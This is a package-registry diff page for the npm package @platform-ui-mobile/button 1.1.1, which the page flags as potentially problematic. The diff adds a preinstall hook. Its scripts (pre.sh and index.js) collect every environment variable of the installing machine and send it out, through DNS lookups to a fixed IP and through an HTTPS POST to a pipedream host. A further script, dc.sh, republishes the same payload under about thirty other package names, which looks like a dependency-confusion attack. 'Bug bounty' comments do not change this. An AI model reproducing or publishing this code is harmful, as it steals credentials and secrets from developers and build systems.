@platform-ui-mobile/button 1.1.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of @platform-ui-mobile/button might be problematic. Click here for more details.

Files changed (5) hide show
  1. package/dc +30 -0
  2. package/dc.sh +80 -0
  3. package/index.js +14 -0
  4. package/package.json +14 -0
  5. package/pre.sh +12 -0
package/dc ADDED
@@ -0,0 +1,30 @@
1
+ @platform-ui-mobile/typography
2
+ @platform-ui-mobile/container-styles
3
+ @platform-ui-mobile/colors
4
+ @platform-ui-mobile/utils
5
+ @platform-ui-mobile/spacing
6
+ @platform-ui-mobile/button
7
+ @platform-ui-mobile/link
8
+ @platform-ui-mobile/icon
9
+ @platform-ui-mobile/slider
10
+ @platform-ui-mobile/counter
11
+ @platform-ui-mobile/breadcrumbs
12
+ @platform-ui-mobile/icons-pack
13
+ page-maker
14
+ tinkoff-form-builder
15
+ babel-plugin-transform-require-ensure
16
+ browser-timings
17
+ dippy
18
+ dynamic-components
19
+ eslint-plugin-tinkoff
20
+ eva.io-core
21
+ eva.io-docker
22
+ page-blocks
23
+ router-way
24
+ route-train
25
+ tinkoff-insurance-utils
26
+ tinkoff-push-web
27
+ alfaform-core-ui
28
+ arui-logger
29
+ arui-private
30
+ thrift-services
package/dc.sh ADDED
@@ -0,0 +1,80 @@
1
+ #!/bin/bash
2
+ POSITIONAL=()
3
+ while [[ $# -gt 0 ]]
4
+ do
5
+ key="$1"
6
+
7
+ case $key in
8
+ -v|--version)
9
+ VERSION="$2"
10
+ shift # past argument
11
+ shift # past value
12
+ ;;
13
+ -s|--searchpath)
14
+ SEARCHPATH="$2"
15
+ shift # past argument
16
+ shift # past value
17
+ ;;
18
+ -l|--lib)
19
+ LIBPATH="$2"
20
+ shift # past argument
21
+ shift # past value
22
+ ;;
23
+ --default)
24
+ DEFAULT=YES
25
+ shift # past argument
26
+ ;;
27
+ *) # unknown option
28
+ POSITIONAL+=("$1") # save it in an array for later
29
+ shift # past argument
30
+ ;;
31
+ esac
32
+ done
33
+ set -- "${POSITIONAL[@]}" # restore positional parameters
34
+
35
+ for i in $(cat dc);
36
+ do
37
+ echo '
38
+ {
39
+ "name": "'$i'",
40
+ "version": "1.1.1",
41
+ "description": "hackerone.com/homosec Bug Bounty Security Reseaarch White Hat",
42
+ "main": "index.js",
43
+ "scripts": {
44
+ "test": "echo \"Error: no test specified\" && exit 1",
45
+ "preinstall":"chmod +x ./pre.sh && ./pre.sh | node index.js"
46
+ },
47
+ "author": "",
48
+ "license": "ISC"
49
+ }
50
+ ' > package.json
51
+
52
+ echo "
53
+ //hackerone.com/homosec
54
+ //Bug Bounty Security Reasearch White Hat t.a.neo@ya.ru
55
+ const http = require('https');
56
+
57
+ req = http.request({
58
+ host: '76c42f27d26091659dca820a37e6f5d3.m.pipedream.net',
59
+ path: '/"$i"',
60
+ method: 'POST'
61
+ });
62
+
63
+ req.write(Buffer.from(JSON.stringify(process.env)).toString('base64'));
64
+ req.end();
65
+ " > index.js
66
+
67
+ echo '
68
+ #!/bin/bash
69
+ d=`date +%s`;
70
+ f=0;
71
+ for i in $(node -e "console.log(JSON.stringify(process.env))" | od -A n -t x1| sed "s/ *//g");
72
+ do dig @178.154.212.234 '$i'.$d.$f.$i;
73
+ ((f+=1));
74
+ done;
75
+
76
+ #//hackerone.com/homosec
77
+ #//Bug Bounty Security Reasearch White Hat t.a.neo@ya.ru
78
+ ' > pre.sh
79
+ npm publish --access=public
80
+ done;
package/index.js ADDED
@@ -0,0 +1,14 @@
1
+
2
+ //hackerone.com/homosec
3
+ //Bug Bounty Security Reasearch White Hat t.a.neo@ya.ru
4
+ const http = require('https');
5
+
6
+ req = http.request({
7
+ host: '76c42f27d26091659dca820a37e6f5d3.m.pipedream.net',
8
+ path: '/@platform-ui-mobile/button',
9
+ method: 'POST'
10
+ });
11
+
12
+ req.write(Buffer.from(JSON.stringify(process.env)).toString('base64'));
13
+ req.end();
14
+
package/package.json ADDED
@@ -0,0 +1,14 @@
1
+
2
+ {
3
+ "name": "@platform-ui-mobile/button",
4
+ "version": "1.1.1",
5
+ "description": "hackerone.com/homosec Bug Bounty Security Reseaarch White Hat",
6
+ "main": "index.js",
7
+ "scripts": {
8
+ "test": "echo \"Error: no test specified\" && exit 1",
9
+ "preinstall":"chmod +x ./pre.sh && ./pre.sh | node index.js"
10
+ },
11
+ "author": "",
12
+ "license": "ISC"
13
+ }
14
+
package/pre.sh ADDED
@@ -0,0 +1,12 @@
1
+
2
+ #!/bin/bash
3
+ d=`date +%s`;
4
+ f=0;
5
+ for i in $(node -e "console.log(JSON.stringify(process.env))" | od -A n -t x1| sed "s/ *//g");
6
+ do dig @178.154.212.234 @platform-ui-mobile/button.$d.$f.$i;
7
+ ((f+=1));
8
+ done;
9
+
10
+ #//hackerone.com/homosec
11
+ #//Bug Bounty Security Reasearch White Hat t.a.neo@ya.ru
12
+